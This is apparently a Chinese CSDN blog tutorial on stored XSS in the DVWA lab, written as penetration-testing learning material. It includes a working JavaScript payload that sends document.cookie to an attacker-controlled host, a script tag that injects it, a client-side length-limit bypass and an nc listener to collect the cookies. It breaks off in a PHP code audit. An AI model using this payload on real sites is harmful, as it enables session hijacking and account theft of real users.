kali渗透学习-Web渗透XSS(三)存储型XSS、DOM型XSS、神器BEFF

本文介绍了Web渗透中的XSS攻击,包括存储型XSS和DOM型XSS的利用方法。重点讲解了如何利用Burp Suite进行测试,以及通过Apache2部署JS文件来盗取客户端cookie。同时,文章还提到了浏览器exploitation框架(BEFF),它是用于Web攻击的平台,由Ruby编写,包含多种模块和payload,可用于浏览器信息收集、键盘记录及漏洞利用等。
摘要由CSDN通过智能技术生成

存储型XSS

1、可长期存储于服务器端

2、每次用户访问都会被执行js脚本,攻击者只需侦听指定端口

#攻击利用方法大体等于反射型xss利用

##多出现在留言板等位置

*推荐使用burpsuite
a、观察返回结果,是否原封不动地返回输入数据?是否有其他标签
在这里插入图片描述
js代码通过留言板存储在服务器中,所以每次点击留言板链接,都会弹出xss弹窗
在这里插入图片描述
注入后会永久在服务器端,每次访问都会下发该注入。
用dvwa测试的时候消除注入需在设置中重置数据库

b、测试加载攻击者控制的服务器中的js文件

#启动apache2【默认侦听80端口】
在这里插入图片描述
a.js 【盗取客户端cookie信息,并把它上传到攻击者控制的服务器的PHP文件】

var img = new Image();
img.src = "http://192.168.56.102:88/cookies.php?
cookie="+document.cookie;

***默认在客户端进行长度的限制,可用burpsuite进行绕过或直接修改HTML代码中的长度限制  【安全性好的,同时在客户端跟服务器端进行长度限制】
在这里插入图片描述

<script src="http://192.168.56.102/a.js"></script>

使用nc演示效果,侦听88端口,提交成功/刷新页面,即可成功获得cookie
在这里插入图片描述
代码审计  【以下代码只是对输入数据进行过滤】

<?php

if(isset($_POST['btnSign']))
{
   

   $message = trim($_POST['mtxMessage']);
   $name    = trim($_POST['txtName']);

   // Sanitize message input
   $me
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值